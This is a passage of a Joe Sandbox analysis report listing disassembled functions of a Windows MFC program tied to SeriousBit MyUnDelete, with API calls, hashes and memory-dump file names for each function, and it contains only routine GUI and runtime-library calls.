Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AllocString$_memset
String ID:
API String ID: 287750986-0
Opcode ID: 62558836e58eb8cb4b459fabff17c1aae8f5bd09ab7fbce684f4db8b70353939
Instruction ID: 7c8e6d02de0fcfb2fc9700497b636ac861c208ed06e37981ae969b807d73a431
Opcode Fuzzy Hash: 62558836e58eb8cb4b459fabff17c1aae8f5bd09ab7fbce684f4db8b70353939
Instruction Fuzzy Hash: 8841A574A00314DFCB25EF25CC45A9AB7B5FF44314F1146AEE566A72E2DB38A980CF48

Function 00415058 Relevance: 9.1, APIs: 6, Instructions: 74COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0041505F

Part of subcall function 00414FB2: __EH_prolog3.LIBCMT ref: 00414FB9
Part of subcall function 00414FB2: GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 00415005
Part of subcall function 00414FB2: GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 00415017

CopyRect.USER32(00000025,00000000), ref: 0041508E
GetCursorPos.USER32(?), ref: 0041509A

Part of subcall function 004069C0: SetRect.USER32(?,?,?,?,?), ref: 004069DB

IsRectEmpty.USER32(00000025), ref: 004150CB
InflateRect.USER32(00000025,?,?), ref: 004150DD
DoDragDrop.OLE32(00000000,00000000,?,00000000), ref: 00415134

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Rect$H_prolog3Profile$CopyCursorDragDropEmptyInflate
String ID:
API String ID: 3333857639-0
Opcode ID: 185f74c05ee1e1e32a84fb71ba3fed8710bc83b1eb879802065219639bf4f1c3
Instruction ID: 65d732f9e44488c213013185dafb89cc117c93a44afcf6044311534c54acdf9d
Opcode Fuzzy Hash: 185f74c05ee1e1e32a84fb71ba3fed8710bc83b1eb879802065219639bf4f1c3
Instruction Fuzzy Hash: 84219C31A00205DBCF119FA1CD04AFFBBB9BF84704F10441AF512A7290EB78A952DB9A

Function 00408832 Relevance: 9.1, APIs: 6, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00408865
GetParent.USER32(?), ref: 00408873
GetParent.USER32(?), ref: 00408886
GetLastActivePopup.USER32(?), ref: 00408897
IsWindowEnabled.USER32(?), ref: 004088AB
EnableWindow.USER32(?,00000000), ref: 004088BE

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 960584d92ce99ee5a979879e596931619577cd246d5cc54718a784d20a4d95b2
Instruction ID: 3f24be5a0905bb0744ff7acdbb8cbb86b8a5b623d2da730e0f8e78e01ec01654
Opcode Fuzzy Hash: 960584d92ce99ee5a979879e596931619577cd246d5cc54718a784d20a4d95b2
Instruction Fuzzy Hash: 0911B633A0122197D7313A669E40B2B76985F64BA0F95813EEC84F73C4EF78CC01429E

Function 00432662 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 0043268A

Part of subcall function 0042A0E1: __getptd.LIBCMT ref: 0042A0EF
Part of subcall function 0042A0E1: __getptd.LIBCMT ref: 0042A0FD

__getptd.LIBCMT ref: 00432694

Part of subcall function 0042DD57: __getptd_noexit.LIBCMT ref: 0042DD5A
Part of subcall function 0042DD57: __amsg_exit.LIBCMT ref: 0042DD67

__getptd.LIBCMT ref: 004326A2
__getptd.LIBCMT ref: 004326B0
__getptd.LIBCMT ref: 004326BB
_CallCatchBlock2.LIBCMT ref: 004326E1

Part of subcall function 0042A186: __CallSettingFrame@12.LIBCMT ref: 0042A1D2

Part of subcall function 00432788: __getptd.LIBCMT ref: 00432797
Part of subcall function 00432788: __getptd.LIBCMT ref: 004327A5

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 98297e3622cf786ec81a25920b6d775093c58ddc7fb22bfbd511c315217bb866
Instruction ID: abdc0df582698cedf21a05686ef6aa931f015e968389f0ac603c593c6e7f8de9
Opcode Fuzzy Hash: 98297e3622cf786ec81a25920b6d775093c58ddc7fb22bfbd511c315217bb866
Instruction Fuzzy Hash: 0C111971D00249EFDB10EFA5D54AAEDBBB0FF08318F60806AF814A7251DB789A11DF55

Function 00422317 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 293memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00422321
CoTaskMemAlloc.OLE32(?,?), ref: 00422445
_memset.LIBCMT ref: 00422467
CoTaskMemFree.OLE32(?), ref: 0042266A

Strings

, xrefs: 00422502

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Task$AllocFreeH_prolog3__memset
String ID:
API String ID: 3303116700-3916222277
Opcode ID: bfc600354d0df7afc153cbcb6fb1508e927f8bbd336a2c831ed08961125006a4
Instruction ID: ff319afdda78798f9a8c8aa22048d33182474d3b8bdac7a41cbdaa2b233302b0
Opcode Fuzzy Hash: bfc600354d0df7afc153cbcb6fb1508e927f8bbd336a2c831ed08961125006a4
Instruction Fuzzy Hash: B6C15D70A00614EFCB24DFA5D984AAEB7F5BF88304F60855EE406EB351DBB5A981CF14

Function 00413273 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004132A3

Strings

AfxFrameOrView90su, xrefs: 00413369
@, xrefs: 00413448
@, xrefs: 004133AF
AfxMDIFrame90su, xrefs: 00413344

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
API String ID: 2102423945-1093365818
Opcode ID: 1e676fd64894255cd77e8c975da0f2758f04435d262746de5a3edaf0c25dacbd
Instruction ID: 3273688b5d8a3806bef39766ecbbba195b84cb03ac164a9e19d5a856a548fdf4
Opcode Fuzzy Hash: 1e676fd64894255cd77e8c975da0f2758f04435d262746de5a3edaf0c25dacbd
Instruction Fuzzy Hash: 6E915371C00209EADB51DFD8D4857DEBBF8AF04345F10806AF949E6181E7B89BC4C798

Function 00456280 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

Software\SeriousBit\MyUnDelete\Images, xrefs: 0045639C

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
